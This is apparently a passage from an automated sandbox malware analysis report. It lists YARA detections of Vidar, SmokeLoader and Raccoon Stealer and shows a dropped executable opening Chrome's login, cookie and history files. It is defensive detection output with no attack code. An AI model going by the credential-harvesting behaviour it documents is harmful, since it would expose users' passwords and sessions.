Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 0_2_00421940 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00421940
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A944020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion, 29_2_6A944020

Stealing of Sensitive Information:

Yara detected Vidar
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match File source: 26.1.cviueca.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.1.SkB6zJ6H3N.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.97A5.exe.2cb15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.0.cviueca.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.1.97A5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.cviueca.2c715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.192F.exe.3180e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.192F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.cviueca.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.0.cviueca.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.97A5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.cviueca.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.0.cviueca.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.cviueca.2d815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SkB6zJ6H3N.exe.2be15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.SkB6zJ6H3N.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.1.cviueca.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.192F.exe.3190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000021.00000002.450724070.00000000047F1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.368853755.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.404074560.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.294055792.0000000003111000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.368895221.00000000004E1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.308080762.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.419226513.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.449678502.0000000002C10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.402440778.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.404878363.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.307863142.0000000000420000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.419361924.00000000031B1000.00000004.00020000.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match File source: 36.3.32BC.exe.48a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.32BC.exe.48a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.442845982.00000000048A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 32BC.exe PID: 5540, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\32BC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\32BC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\32BC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\32BC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Yara detected Credential Stealer
Source: Yara match File source: 36.3.32BC.exe.2d741e6.1.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Vidar
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match File source: 26.1.cviueca.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.1.SkB6zJ6H3N.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.97A5.exe.2cb15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.0.cviueca.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.1.97A5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.cviueca.2c715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.192F.exe.3180e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.192F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.cviueca.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.0.cviueca.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.97A5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.cviueca.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.0.cviueca.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.cviueca.2d815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SkB6zJ6H3N.exe.2be15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.SkB6zJ6H3N.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.1.cviueca.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.192F.exe.3190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000021.00000002.450724070.00000000047F1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.368853755.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.404074560.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.294055792.0000000003111000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.368895221.00000000004E1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.308080762.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.419226513.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.449678502.0000000002C10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.402440778.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.404878363.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.307863142.0000000000420000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.419361924.00000000031B1000.00000004.00020000.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match File source: 36.3.32BC.exe.48a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.32BC.exe.48a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.442845982.00000000048A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 32BC.exe PID: 5540, type: MEMORYSTR